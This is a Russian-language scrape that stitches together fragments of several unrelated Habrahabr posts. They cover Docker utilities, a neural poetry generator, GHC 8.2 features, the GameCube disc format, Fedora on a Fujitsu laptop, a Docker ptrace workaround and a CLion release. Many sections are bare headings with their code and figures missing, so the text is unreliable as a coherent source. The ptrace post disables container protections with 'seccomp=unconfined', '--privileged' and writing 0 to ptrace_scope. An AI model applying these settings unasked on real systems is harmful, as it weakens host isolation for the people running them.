Инспектируя исходный образ, docker-slim выполнит несколько шагов, а затем создаст его облегченную версию. Посмотрим, какой в итоге получился размер:

На иллюстрации видно, что размер образа уменьшился до 24.9 МБ. Если запустить контейнер, то он будет работать точно так же, как и его предыдущая версия. Docker-slim хорошо справляется с приложениями на Java, Python, Ruby и Node.js.

Попробуйте docker-slim сами, и, возможно, это позволит вам освободить немало места. Эта утилита корректно отработала практически во всех моих проектах. Получить более подробную информацию о docker-slim можно из соответствующей документации.

4. Rocker — преодолеваем ограничения Dockerfile

Большинство разработчиков для сборки образов предпочитают использовать Dockerfile. Dockerfile — это декларативный способ определения команд по созданию образа, которые пользователь мог бы выполнить в командной строке.

Rocker добавляет в Dockerfile набор новых инструкций. Rocker был создан в Grammarly для решения проблем, с которыми эта компания столкнулась при использовании Dockerfile. В Grammarly написали содержательную статью, объясняющую причины создания Rocker. Если у вас есть желание лучше разобраться с Rocker, рекомендую эту статью к прочтению. В ней отмечены две проблемы:

1. Размер образов.
2. Скорость сборки.

Там также упоминается несколько добавленных Rocker инструкций. Для получения информации о всех поддерживаемых Rocker инструкциях см. документацию.

1. MOUNT — позволяет настроить совместное использование томов различными сборками, что удобно, например, для инструментов управления зависимостями.
2. FROM — эта инструкция существует и в стандартном Dockerfile. При этом Rocker позволяет добавить несколько FROM в один файл. Это значит, что с помощью одного Rockerfile можно сделать несколько образов, например, один для сборки, а другой для выполнения приложения. Первый набор инструкций соберет артефакт, используя все необходимые зависимости. Второй набор инструкций может использовать артефакт, созданный на первом шаге. С помощью этого приема достигается значительное уменьшение размера образа.
3. TAG позволяет на разных этапах сборки создавать метки образа, то есть вручную это делать больше не нужно.
4. PUSH используется для загрузки образов в реестр.
5. ATTACH позволяет интерактивно подключаться к контейнеру на промежуточных этапах сборки, что очень удобно для отладки.

Rocker требует установки. Для пользователей Mac команды следующие:

Rockerfile выглядит вот так:

Для сборки образа и загрузки его на Docker Hub выполните:

У Rocker очень интересная функциональность. Чтобы узнать больше, обратитесь к его документации.

5. Ctop — top-подобная утилита для вывода информации о контейнерах

Я начал пользоваться ctop сравнительно недавно. Эта утилита в реальном времени отображает метрики сразу нескольких контейнеров. Если вы используете Mac, то для установки ctop можете воспользоваться следующей командой:

Для работы ctop требуется установка переменной окружения DOCKER_HOST.

Выполните ctop, чтобы отобразить состояние всех контейнеров.

Для вывода информации только о запущенных контейнерах выполните ctop -a.

Ctop проста в использовании и при этом весьма полезна. Более подробную информацию вы можете найти в документации.

Ссылки:

1. Оригинал: 5 Docker Utilities You Should Know.

https://habrahabr.ru/post/330326/

Языковые модели

Определение

N-граммные языковые модели

Оценивание языковой модели

Реализация языковой модели для генерации стихов

Построение архитектуры сети

— незнакомое слово. Проблема в том, что модель радостно выучивает, что вслед за любым словом может идти незнакомое слово. В итоге, выдаваемое ею распределение оказывается смещено в сторону именно этого незнакомого слова. Конечно, это легко решается: нужно всего лишь сэмплировать из распределение без этого токена, но всё равно остается ощущение, что полученная модель несколько кривовата.

Альтернативным вариантом является использование many-to-one архитектуры:

При этом приходится нарезать всевозможные цепочки слов из обучающей выборки — что приведет к заметному её разбуханию. Зато все цепочки, для которых следующее слов — неизвестное, мы сможем просто пропускать, полностью решая проблему с частым предсказанием токена.

Такая модель имела у нас следующие параметры (в терминах библиотеки keras):

Как видно, в неё включено 60000 + 1 слово: плюс первый токен это тот самый .

Проще всего повторить её можно небольшой модификацией примера. Основное её отличие в том, что пример демонстрирует посимвольную генерацию текста, а вышеописанный вариант строится на пословной генерации.

Полученная модель действительно что-то генерирует, но даже грамматическая согласованность получающихся предложений зачастую не впечатляет (про смысловую нагрузку и говорить нечего). Логичным следующим шагом является использование предобученных эмбеддингов для слов. Их добавление упрощает обучение модели, да и связи между словами, выученные на большом корпусе, могут придать осмысленность генерируемому тексту.

Основная проблема: для русского (в отличие от, например, английского) сложно найти хорошие словоформенных эмбеддингов. С имеющимися результат стал даже хуже.

Попробуем пошаманить немного с моделью. Недостаток сети, судя по всему — в слишком большом количестве параметров. Сеть просто-напросто не дообучается. Чтобы исправить это, следует поработать с входным и выходным слоями — самыми тяжелыми элементами модели.

Доработка входного слоя

Очевидно, имеет смысл сократить размерность входного слоя. Этого можно добиться, просто уменьшив размерность словоформенных эмебедингов — но интереснее пойти другим путём.

Вместо того, чтобы представлять слово одним индексом в высокоразмерном пространстве, добавим морфологическую разметку:

Каждое слово будем описывать парой: его лемма и грамматическое значение. Использование лемм вместо словоформ позволяет очень сильно сократить размер эмбеддингов: первым тридцати тысячам лемм соответствует несколько сотен тысяч различных слов. Таким образом, серьёзно уменьшив входной слой, мы ещё и увеличили словарный запас нашей модели.

Как видно из рисунка, лемма имеет приписанную к ней часть речи. Это сделано для того, чтобы можно было использовать уже предобученные эмбеддинги для лемм (например, от RusVectores). С другой стороны, эмбеддинги для тридцати тысяч лемм вполне можно обучить и с нуля, инициализируя их случайно.

Грамматическое значение мы представляли в формате Universal Dependencies, благо у меня как раз была под рукой модель, обученная для Диалога-2017.

При подаче грамматического значения на вход модели оно переводится в битовую маску: для каждой грамматической категории выделяются позиции по числу граммем в этой категории — плюс одна позиция для отсутствия данной категории в грамматическом значении (Undefined). Битовые вектора для всех категорий склеиваются в один большой вектор.

Вообще говоря, грамматическое значение можно было бы, так же как лемму, представлять индексом и обучать для него эмбеддинг. Но битовой маской сеть показала более высокое качество.

Этот битовый вектор можно, конечно, подавать в LSTM непосредственно, но лучше пропускать его предварительно через один или два полносвязных слоя для сокращения размерности и, одновременно — обнаружения связей между комбинациями граммем.

Доработка выходного слоя

Вместо индекса слова можно предсказывать всё те же лемму и грамматическое значение по отдельности. После этого можно сэмплировать лемму из полученного распределения и ставить её в форму с наиболее вероятным грамматическим значением. Небольшой минус такого подхода в том, что невозможно гарантировать наличие такого грамматического значения у данной леммы.

Эта проблема легко исправляется двумя способами. Честный путь — сэмплировать именно слово из действительно реализуемых пар лемма + грамматическое значение (вероятностью этого слова, конечно, будет произведение вероятностей леммы и грамматического значения). Более быстрый альтернативный способ — это выбирать наиболее вероятное грамматическое значение среди возможных для сэмплированной леммы.

Кроме того, softmax-слой можно было заменить иерархическим softmax’ом или вообще утащить реализацию noise contrastive estimation из tensorflow. Но нам, с нашим размером словаря, оказалось достаточно и обыкновенного softmax. По крайней мере, вышеперечисленные ухищрения не принесли значительного прироста качества модели.

Итоговая модель

В итоге у нас получилась следующая модель:

Обучающие данные

До сих пор мы никак не обсудили важный вопрос — на чём учимся. Для обучения мы взяли большой кусок stihi.ru и добавили к нему морфологическую разметку. После этого отобрали длинные строки (не меньше пяти слов) и обучались на них.

Каждая строка рассматривалась как самостоятельная — таким образом мы боролись с тем, что соседние строки зачастую слабо связаны по смыслу (особенно на stihi.ru). Конечно, можно обучаться сразу на полном стихотворении, и это могло дать улучшение качества модели. Но мы решили, что перед нами стоит задача построить сеть, которая умеет писать грамматически связный текст, а для такой цели обучаться лишь на строках вполне достаточно.

При обучении ко всем строкам добавлялся завершающий символ , а порядок слов в строках инвертировался. Разворачивать предложения нужно для упрощения рифмовки слов при генерации. Завершающий же символ нужен, чтобы именно с него начинать генерацию предложения.

Кроме всего прочего, для простоты мы выбрасывали все знаки препинания из текстов. Это было сделано потому, что сеть заметно переобучалась под запятые и прочие многоточия: в выборке они ставились буквально после каждого слова. Конечно, это сильное упущение нашей модели и есть надежда исправить это в следующей версии.

Схематично предобработка текстов может быть изображена так:

Стрелки означают направление, в котором модель читает предложение.

Реализация генератора

Правила-фильтры

Перейдём, наконец-то, к генератору поэзии. Мы начали с того, что языковая модель нужна только для построения гипотез о следующем слове. Для генератора необходимы правила, по которым из последовательности слов будут строиться стихотворения. Такие правила работают как фильтры языковой модели: из всех возможных вариантов следующего слова остаются только те, которые подходят — в нашем случае по метру и рифмовке.

Метрические правила определяют последовательность ударных и безударных слогов в строке. Записываются они обычно в виде шаблона из плюсов и минусов: плюс означает ударный слог, а минусу соответствует безударный. Например, рассмотрим метрический шаблон + — + — + — + — (в котором можно заподозрить четырёхстопный хорей):

Генерация, как уже упоминалось, идёт справа налево — в направлении стрелок на картинке. Таким образом, после мглою фильтры запретят генерацию таких слов как метель (не там ударение) или ненастье (лишний слог). Если же в слове больше 2 слогов, оно проходит фильтр только тогда, когда ударный слог не попадает на “минус” в метрическом шаблоне.

Второй же тип правил — ограничения по рифме. Именно ради них мы генерируем стихотворения задом наперед. Фильтр применяется при генерации самого первого слова в строке (которое окажется последним после разворота). Если уже была сгенерирована строка, с которой должна рифмоваться данная, этот фильтр сразу отсечёт все нерифмующиеся слова.

Также применялось дополнительное правило, запрещающее считать рифмами словоформы с одинаковой леммой.

У вас мог возникнуть вопрос: а откуда мы взяли ударения слов, и как мы определили какие слова рифмуются с какими? Для работы с ударениями мы взяли большой словарь и обучили на этом словаре классификатор, чтобы предсказывать ударения незнакомых слов (история, заслуживающая отдельной статьи). Рифмовка же определяется несложной эвристикой на основе расположения ударного слога и его буквенного состава.

Лучевой поиск

В результате работы фильтров вполне могло не остаться ни одного слова. Для решения этой проблемы мы делаем лучевой поиск (beam search), выбирая на каждом шаге вместо одного сразу N путей с наивысшими вероятностями.

Итого, входные параметры генератора — языковая модель, метрический шаблон, шаблон рифмы, N в лучевом поиске, параметры эвристики рифмовки. На выходе же имеем готовое стихотворение. В качестве языковой модели в этом же генераторе можно использовать и N-граммную модель. Система фильтров легко кастомизируется и дополняется.

Примеры стихов

Так толку мне теперь грустить
Что будет это прожито
Не суждено кружить в пути
Почувствовав боль бомжика

Затерялся где то на аллее
Где же ты мое воспоминанье
Я люблю тебя мои родные
Сколько лжи предательства и лести
Ничего другого и не надо
За грехи свои голосовые

Скучаю за твоим окном
И нежными эфирами
Люблю тебя своим теплом
Тебя стенографируя

Ссылки

• Репозиторий.
  
• Пакет в pypi.
  
• Паблик в VK со стихами.
  
• Модель и словари, необходимые для её работы.
  
• Оксфордский курс NLP, подготовленный при участии DeepMind.
  
• One Billion Word Benchmark for Measuring Progress in Statistical Language Modeling.
• Exploring the Limits of Language Modeling.
  
• Character-Aware Neural Language Models.

Пост был написан совместно с Гусевым Ильёй. В проекте также принимали участие Ивашковская Елена, Карацапова Надежда и Матавина Полина.

Работа над генератором была проделана в рамках курса “Интеллектуальные системы” кафедры Компьютерной лингвистики ФИВТ МФТИ. Хотелось бы поблагодарить автора курса, Константина Анисимовича, за советы, которые он давал в процессе.

Большое спасибо atwice за помощь в вычитке статьи.

Original source: habrahabr.ru (comments, light).

https://habrahabr.ru/post/334046/

Compact regions

compacted <- getCompact <$> compact someBigHeavyData

Deriving strategies

{-# LANGUAGE DeriveAnyClass #-}
class Foo a where
    doFoo :: a -> b
    doFoo = defaultImplementation

data Bar = Bar deriving(Foo)

data Bar = Bar
instance Foo Bar

{-# LANGUAGE GeneralizedNewtypeDeriving #-}
newtype WrappedInt = WrappedInt { unwrap :: Int } deriving(Unbox)

{-# LANGUAGE DeriveAnyClass, GeneralizedNewtypeDeriving, DerivingStrategies #-}
newtype Baz = Baz Quux
  deriving          (Eq, Ord)
  deriving stock    (Read, Show)
  deriving newtype  (Num, Floating)
  deriving anyclass C

data Foo = Foo

deriving anyclass instance C Foo

Другие улучшения автовывода инстансов

{-# LANGUAGE DeriveAnyClass, DefaultSignatures #-}

class Foo a where
    bar :: a -> String
    default bar :: Show a => a -> String
    bar = show

    baz :: a -> a -> Bool
    default baz :: Ord a => a -> a -> Bool
    baz x y = compare x y == EQ

data Option a = None | Some a deriving (Eq, Ord, Show, Foo)

class HasRing a where
  type Ring a

newtype L1Norm a = L1Norm a deriving HasRing

instance HasRing (L1Norm a) where
  type Ring (L1Norm a) = Ring a

Backpack

Прочее

• Во внутренностях самого компилятора формализовано понятие join points — блоков кода, всегда выполняющихся после данного ветвления. Даёт несущественный, но статистически значимый прирост производительности скомпилированного кода и открывает простор для дальнейших оптимизаций.
• Улучшена производительность на NUMA-системах.
• Добавлена возможность выделять для сборщика мусора меньше потоков, чем непосредственно для мутатора самой программы. Simon Marlow описывает, как и зачем это было реализовано в контексте использования Haskell в Facebook в этом посте.
• Улучшения в поддержке levity-полиморфизма, ответственного за возможность написания функций, работающих как с типами, обитающими в * (более-менее обычные типы, которые мы так любим), так и с обитающими в # (неленивые unboxed-типы).
• Улучшения в типобезопасности рефлексии.
• Возможность использовать ld.gold либо ld.lld вместо стандартного линкера ld.
• Сообщения об ошибках теперь сделаны цветными и с указателями на позицию ошибки в стиле clang.

https://habrahabr.ru/post/334028/

Введение

Техническая составляющая

1. Основная информация (boot.bin)
2. Дополнение к основной информации (bi2.bin)
3. Apploader (apploader.img)
4. FileStringTable (fst.bin)
5. DOL (main.dol)
6. Основные данные

Основная информация, блок boot.bin

class gcmBoot
{
	public uint gameCode;
	public ushort makerCode;
	public byte diskID;
	public byte version;
	//seek to 0x1C
	public uint DVDMagicWord; //0xC2339F3D
	public string gameName;
	//seek to 0x420
	public uint offsetMainDol;
	public uint offsetFST;
	public uint sizeFST;
}

Дополнение к основной информации, блок bi2.bin

Apploader

FileStringTable, блок fst.bin

class gcmFST
{
	public byte flags; // 0: File; 1: Dir;
	public uint offsetName;//Real size 3 byte
	
	//if flags = 0
	public uint fileOffset;
	public uint fileSize;
	
	//if flags = 1 
	public uint dirParent;
	public uint dirNext;
}

1. 4 байта – указатель на файл в образе
2. 4 байта – размер файла

1. 4 байта – номер папки, в которой находится данная папка
2. 4 байта – номер элемента, на котором заканчиваются элементы в данной папке

DOL

1. Семь TEXT секций (код)
2. Одиннадцать DATA секций (данные)

Основные данные

Заключение

https://habrahabr.ru/post/334042/

Некоторое время назад я приобрёл для домашнего использования ноутбук FUJITSU LIFEBOOK E746, который позиционируется как рабочая лошадка для бизнеса. В основном, они продаются с предустановленным Windows 10; с трудом, но возможно найти экземпляры без предустановленной системы. Производитель поддерживает официально только Windows, в сети я находил информацию, что на нём заводится Ubuntu, но с оговорками. Так как переплачивать за операционную систему, которую я давно не использую и не планирую использовать (Windows 10), не особо хотелось, то я заказал его без системы и установил на нём Linux (Fedora 25). В этом небольшом обзоре я хочу поделиться с общественностью этим опытом. Целевая аудитория этой статьи — люди, которые интересуются недорогими, средними по производительность ноутбуками под Linux. Для остальных, скорее всего, особого интереса эта заметка предоставлять не будет.

Сразу отмечу, что это герой данной статьи — не самая актуальная машинка. Представленный в 2016 году, оснащённый процессором Intel Core 6-го поколения — это не писк моды. Зато соотношение цена/качество не может не радовать.

Немного об аппаратной составляющей

Характеристики приведены на официальном сайте, копировать эту информацию сюда особого смысла нет. В сети также есть обзоры этого ноутбука, например, тут.

Заказывал я его в Германии, в официальном магазине Фуджитсу. Мне достался экземпляр с английской (Великобритания) клавиатурой, базовой станций (т.н. порт-репликатор) в комплекте, двумя сетевыми адаптерами (один для самого ноутбука, второй для базовой станции). Процессор i5 (Intel Core i5-6200U @ 2.80 GHz), 8Гб памяти, DVD привод.

Так как клавиатура английская, русские буквы пришлось клеить самостоятельно

Единственное, что я хочу добавить к имеющимся обзорам и спецификациям — это большой набор стандартных портов (не говоря уже о базовой станции с 4 USB Type-A, 1 eSATA, 2 DisplayPort, LAN, 1 VGA, 1 DVI, Audio: line-in/out), а также возможность расширения памяти, и горячей замене DVD привода на дополнительный диск или второй аккумулятор:

Установка и настройка операционной системы (Fedora 25)

Теперь о программном обеспечении. У меня нет какого-либо неприятия того или иного дистрибутива линукса. Исторически сложилось, что в основном я использую Red Hat или Centos как для разработки, так и как платформу для установки клиентам. Поэтому выбор пал на Fedora 25: не такой консервативный, как Centos, более-менее стабильный в отличие от новейшей Fedora 26.

Дистрибутив в виде ISO, оптимизированный для сетевой установки, можно взять отсюда. Для того, чтобы было понятно конечное состояние ноутбука, расскажу про установку и настройку немного подробней.

Для начала, образ ISO нужно закинуть на флешку. Например, используя любой другой компьютер под линукс:

• вставляем пустую флешку объёма большего, чем файл ISO. Тип файловой системы на ней не важен, главное, она не должна быть разбита на тома.
• смотрим, как она смонтирована и какому устройству соответствует:
  

  cat /proc/mounts

• размонтируем это устройство, иначе в требуемом нам режиме оно будет недоступно:
  

  umount /dev/NNN

• переходим в режим root и переходим в каталог, где сохранен файл ISO.
• используем стандартную утилиту блочного копирования данных:
  

  dd bs=4M if=Fedora-Workstation-netinst-x86_64-25-1.3.iso of=/dev/NNN

В BIOS выбираем опцию загрузки по USB и загружаем инсталлятор. В сети есть красочная инструкция по установке (формально, для версии 26, но я не вижу в ней каких-либо отличий от версии 25). Следуя этой инструкции, необходимо:

• Задать все параметры сетевой карты, к которой подключён кабель, чтобы работал доступ в интернет: ip, шлюз, dns, активировать адаптер, задать имя компьютера.
• В окне настроек времени выбрать правильный часовой пояс и настроить время. Я лично всегда использую синхронизацию времени по сети.
• Разбить диск на разделы. Обычно я использую схему разбивки по умолчанию, но значительно уменьшаю размер папки /home, так как все рабочие данные предпочитаю сохранять в папке /work
• Выбрать ближайшее зеркало, откуда будут вытягиваться пакеты в процессе инсталляции.

После этого нажимаем на «Начать установку». Пока идёт скачивание и установка пакетов, имеется возможность задать пароль рута, а также добавить пользователей в систему. После завершения установки перезагрузка, после чего шаг второй — настройка окружения и ПО. Основной инструмент этого этапа — консоль. Естественно, все дальнейшие операции делаются из под рута:

• Первое, что необходимо сделать на свежеустановленной системе — обновить её. В системе уже присутствует пакетный менеджер dnf. Также еще пока остался старый добрый yum, который вызывает соответствующие команды dnf. Я по привычке использую yum. Пакетные репозитории уже настроены по умолчанию, поэтому для обновления всей системы достаточно команды:
  

  yum update

• Добавляем полезные репозитории с ПО, которое не входит в дистрибутив. Установка ПО не напрямую, а из репозиторя имеет то преимущество, что потом, при появлении новых версий, оно будет автоматически обновляться (по команде yum update).

  
  
  1. rpmfusion — для медиаплейера VLC, кодеков, Steam. Достаточно установить два небольших пакета, и репозиторий будет активирован
     

     rpm -ivh http://download1.rpmfusion.org/free/fedora/rpmfusion-free-release-25.noarch.rpm
     rpm -ivh http://download1.rpmfusion.org/nonfree/fedora/rpmfusion-nonfree-release-25.noarch.rpm

  2. Репозиторий Google Chrome: готового пакета нет, нужно вручную добавить файл google-chrome.repo в папку /etc/yum.repos.d со следующим содержанием:
     

     [google-chrome]
     name=google-chrome
     baseurl=http://dl.google.com/linux/chrome/rpm/stable/x86_64
     enabled=1
     gpgcheck=1
     gpgkey=https://dl.google.com/linux/linux_signing_key.pub

  3. Если в качестве системной оболочки используется GNOME3, то для установки его расширений из Google Chrome нужна библиотека chrome-gnome-shell из репозитория region51-chrome-gnome-shell. Этот репозиторий также устанавливается вручную — находясь в папке /etc/yum.repos.d, необходимо его загрузить:
     

     wget https://copr.fedorainfracloud.org/coprs/region51/chrome-gnome-shell/repo/fedora-25/region51-chrome-gnome-shell-fedora-25.repo

  
  

• После чего одной командой можно установить всё прикладное ПО общего назначения (естественно, этот список — только пример того, что может понадобится в начале, я ни в коем случае его никому не навязываю):

  
  

  yum install mc gnome-commander menulibre gnome-tweak-tool dconf-editor vlc gimp inkscape gthumb steam lshw lshw-gui brasero audacity thunderbird unzip unrar google-chrome-stable java

  
  

  где:
  mc — терминальный файловый менеджер
  gnome-commander — графический файловый менеджер
  menulibre — утилита настройки системного меню
  gnome-tweak-tool и dconf-editor — утилиты для тонкой настройки оболочки GNOME3
  vlc — медиаплейер. Функциональный музыкальный плейер, Rhythmbox, уже установлен по-умолчанию
  gimp — растровый графический редактор
  inkscape — векторный графический редактор
  gthumb — менеджер изображений, в чём-то похожий на старый добрый ACDSee
  steam — да-да, тот самый Steam
  lshw lshw-gui — утилита для просмотра детализированной информации о начинке ноутбука
  brasero — запить CD, DVD дисков
  audacity — аудио-редактор
  thunderbird — почтовый клиент от Mozilla
  unzip unrar google-chrome-stable java — ну тут все очевидно

  
  

• Если vlc будет основным видеоплейером, то имеет смысл установить для него кодеки:

  
  

  yum install gstreamer-plugins-bad gstreamer-plugins-bad-free-extras gstreamer-plugins-bad-nonfree gstreamer-plugins-ugly gstreamer-ffmpeg gstreamer1-libav gstreamer1-plugins-bad-free-extras gstreamer1-plugins-bad-freeworld gstreamer1-plugins-base-tools gstreamer1-plugins-good-extras gstreamer1-plugins-ugly gstreamer1-plugins-bad-free gstreamer1-plugins-good gstreamer1-plugins-base gstreamer1

  
  

  К сожалению, DVD кодек в этот комплект не входит, так как является проприетарным. Для его установки нужно погуглить libdvdcss

  
  

• В стандартных репозиториях есть несколько полезных расширений для рабочего стола

  
  

  yum install gnome-shell-extension-apps-menu gnome-shell-extension-places-menu gnome-shell-extension-user-theme gnome-shell-extension-freon gnome-shell-extension-drive-menu gnome-shell-extension-openweather gnome-shell-extension-window-list

  
  

  После установки расширений необходимо перелогироваться, после чего их можно активировать из утилиты Tweek Tools

  
  
• Другие расширения устанавливаются из броузера. Библиотека расширений тут. Если используется Google Chrome, то для него нужно установить дополнительную библиотеку:
  

  yum install chrome-gnome-shell

После всех этих и нескольких дополнительных настроек, у меня на рабочем столе стильный ноутбук с широким набором открытого прикладного ПО и стильным рабочим столом:

Производительность

Для измерения производительности я воспользовался программой Geekbench 4.1. В бесплатном варианте эта программа сгружает результаты замеров на сервер Geekbench (если не платить, то сам будешь товаром). После этого там можно посмотреть как результаты своего теста, так и сравнить с другими системами.

Для моего ноутбука, результаты такие:

Интересно, что такой же ноутбук, но под Windows, показывает иную производительность.

Если посмотреть на модели с тем же процессором (i5-6200U), то видно, что в многопоточном тесте E746 проигрывает достаточно многим моделям, также работающим под Linux (напр. Dell Latitude E5470, MacBook9,1, HP EliteBook 820). Несмотря на тот же самый процессор, что-то у E746 подтормаживает. С другой стороны, в однопоточном режиме от находостся наверху списка.

Также можно взглянуть на всю серию FUJITSU LIFEBOOK. В принципе, E746 не так уж и сильно уступает в этом тесте как старшим моделям серии, так и моделям с процессором i7. Опять же из этой выборки видно, что, за редким исключением, эти ноутбуки работают под управлением Windows, хотя, как показывает мой личный опыт, Fedora ведёт себя очень достойно на этом железе. Но об этом в следующем разделе.

Стабильность работы

Вот список оборудования, которое заработало сразу же после установки Fedora 25 без всяких дополнительных настроек: всё (за исключением дополнительной клавиши ECO).

То есть оба сетевых адаптера, камера, звук, изменение яркости экрана, дополнительная клавиша вкл./выкл. беспроводного адаптера, уход в спящий режим при закрытии крышки и пробуждение из него при открытии, прокрутка с тачпада заработали из коробки (на версии ядра линукс 4.11.10).

Температурный режим: вентилятор включается, но редко. Например, в момент подготовки этого документа (в фоне работает Rhythmbox), сенсоры показывают следующее:

Устойчивость: на данный момент 5 дней с момента последней перезагрузки, при этом многократная активация спящего режима, установка/съём с базовой станции (хотя это, по идее, чисто аппаратная процедура, прозрачная для операционки), переключение сети с проводного на беспроводной адаптер. Никаких помех и проблем не выявлено.

Как отмечается во всех обзорах, которые я читал, E746 — это не игровой ноутбук. Да и игр, кроме HalfLife 2, у меня нет. Но ради теста я таки запустил HL2. На максимальных настройках графики игра прекрасно себя чувствует, видеоряд совершенно плавный, без задержек. Хотя я и сам понимаю, что игра почти 15-летней давности так и должна вести себя на современном железе:

Немного истории

Некоторое (продолжительное) время я использовал LIFEBOOK E8110, выпущенный в 2006. Пара фотографий этого дедушки, предшественника E746 у меня сохранилась. Не могу удержаться и прикреплю одну:

На этом завершусь. Спасибо всем, кто дочитал до конца.

https://habrahabr.ru/post/334032/

https://habrahabr.ru/post/334030/

Ежедневник

Задачи

Портфель

Контакты

Документы

Zimbra

https://habrahabr.ru/post/334026/

https://habrahabr.ru/post/334024/

Mesh-сети Bluetooth и Internet of Things

О группе Bluetooth SIG

• VPN – типы подключения и проверка безопасности
• Wi-Fi: спрос растет, а возможности ограничены
• BRAS для операторов связи
• SD-WAN как конкурент традиционному MPLS
• DPI на помощь спутниковому интернету – опыт на сети связи ANADYR.NET

https://habrahabr.ru/post/333998/

https://habrahabr.ru/post/333992/

В последние два года мы широко используем Docker как для разработки, так и для выполнения систем в производственной среде, и все текущие продукты для наших клиентов разрабатываются именно с учетом данной системы контейнеризации. Стоит отметить, что Docker достаточно сильно изменяется от версии к версии, добавляя как дополнительные возможности (Swarm, Compose), так и дополнительные инструменты повышения защищенности и контроля приложений.

Так с большим удивлением мы недавно обнаружили, что контейнер, который был разработан и протестирован некоторое время назад, не работает в текущей версии Docker. Дело в том, что контейнер был не совсем типовым и внутри него использовалась утилита strace для анализа поведения процесса. Про данное применение утилиты мы ранее подробно писали на Habrahabr.

Сегодня у наших разработчиков наконец-то дошли руки до внедрения данного проблемного
контейнера в приложение и они обнаружили, что он больше не работает. Начав разбираться в чем причина такого поведения, мы увидели, что strace, а конкретно ptrace, не может присоединяться к процессам и выдает ошибку вида:

strace: attach: ptrace(PTRACE_ATTACH, ...): Operation not permitted Could not attach to process.  If your uid matches the uid of the target process, check the setting of /proc/sys/kernel/yama/ptrace_scope, or try again as the root user.  For more details, see /etc/sysctl.d/10-ptrace.conf

Случай довольно редкий, и решение легко не идентифицируется коллективным разумом разработчиков, хотя разных подсказок разбросано достаточно много. Итак, в чем же было дело?

Подсистема Seccomp

В новых ядрах ОС Linux новый Docker использует функцию ядра seccomp, которая позволяет блокировать системные вызовы внутри контейнера. Документация Docker по поводу данной возможности находится здесь. Ptrace находится среди заблокированных системных вызовов. Тонкая настройка механизма осуществляется с помощью аргумента Docker run --security-opt seccomp=/path/to/file.json, который позволяет указать файл, в котором описывается что разрешено, а что нет. Поскольку наш контейнер работает в защищенной среде, то мы отключаем данную возможность полностью: --security-opt seccomp=unconfined.

Поведение Ptrace

Strace выдала нам подсказку о том, что есть некий псевдофайл /proc/sys/kernel/yama/ptrace_scope, в котором тоже описываются ограничения ptrace. Смотрим в документацию ядра и узнаем, что не все так просто, как было раньше. Значения 0-3, находящиеся в данном псевдофайле существенно меняют поведение ptrace:

• 0 — UID трассирующего процесса должен совпадать с UID трассируемого или быть 0 (поведение как было раньше);
• 1 — ограниченный ptrace, процессы должны быть родственными, трассируемый процесс должен быть потомком
  трассирующего или трассирующий процесс должен иметь UID=0;
• 2 — для трассирующего процесса должен быть установлен флаг CAP_SYS_PTRACE или потомок устанавливает себе флаг PTRACE_TRACEME;
• 3 — трассирование запрещено.

Выполнив

docker exec -it  cat /proc/sys/kernel/yama/ptrace_scope

мы обнаружили, что в файле установлено значение 1, соответственно, не будучи родственным процессом, strace не мог подключиться к трассируемому процессу. При этом, попытка установить в /proc/sys/kernel/yama/ptrace_scope значение 0 не увенчалась успехом, было получено сообщение о том, что "/proc is read only".

Привилегированный запуск контейнера

Преодолеть данное ограничение нам помог флаг Docker, разрешающий в привилегированное исполнение: --privileged, а в инициализацию приложения мы добавили установку значения "0" в псевдофайл /proc/sys/kernel/yama/ptrace_scope.

echo 0 > /proc/sys/kernel/yama/ptrace_scope

В итоге проблема была успешно решена. Пример решения и аргументы для запуска контейнера можно найти в нашем GitHub репозитории для web ssh прокси.

Было интересно заметить, что ядро Linux получает существенные улучшения безопасности и дополнительные инструменты управления настройками безопасности, о которых достаточно трудно узнать, если не держать постоянно руку "на пульсе" и работать в рамках приложений, которые развиваются в рамках продолжительных жизненных циклов в стабильных средах. В один прекрасный день обнаруживаешь новый удивительный мир улучшений, которые "внезапно" проявили себя благодаря вот такому досадному случаю.

https://habrahabr.ru/post/334016/

• Расширению возможностей анализатора кода (это касается как встроенного, так и стороннего инструмента – CLang-Tidy)
• C++17 в мастере создания нового проекта
• Поддержке PCH для MSVC (мы ниже обязательно расшифруем все аббревиатуры!)
• Force Step Into в отладчике
• Автоматическому созданию Google Test конфигураций для таргетов, слинкованных с gmock
• Отменяемым асинхронным действиям навигации и загрузки CMake
• Общим улучшения производительности
• И еще многому другому!

Анализатор кода

Новые quick-fixes и улучшения корректности парсера

• это и более корректный анализ кода в случае std::enable_if,
• и поддержка va_* макросов (анализатор раньше ошибочно помечал переменные, используемые только в этих макросах, как неиспользуемые),
• и более правильная работа с функциями, которые принимают пакет параметров и еще не-шаблонные аргументы,
• и корректная работа с вложенными шаблонными типами в STL контейнерах для GCC 5 / 6,
• и многое-многое другое.

Интеграция с Clang-Tidy

• Clang-Tidy необходимо брать из нашего репозитория, где лежит версия с нашими изменениями для корректной работы с CLion. Как только наши патчи примут в LLVM (они сейчас на ревью) и изменения попадут в мастер, можно будет использовать основную ветку LLVM. Подробнее о том, где искать наш репозиторий и какие именно патчи, можно почитать в блоге.
• В релиз не успела попасть настройка UI для смены Clang-Tidy, так что пока надо заменять бинарник встроенного Clang-Tidy. Но это будет поправлено, мы надеемся, в одном из ближайших обновлений.

C++17 в мастере создания нового проекта

PCH для MSVC

Отладчик

Gmock и Google Test конфигурации

Отменяемые действия навигации и загрузки CMake

Интерфейс Find in Path, улучшения поддержки систем контроля версий и другое

• Улучшенный пользовательский интерфейс поиска Find in Path
• Новые возможности встроенной VCS поддержки, такие как Git Revert, Reword и настройки редактирования commit messages
• Улучшения в поддержке мониторов с высоким разрешением (HiDPI)

https://habrahabr.ru/post/334012/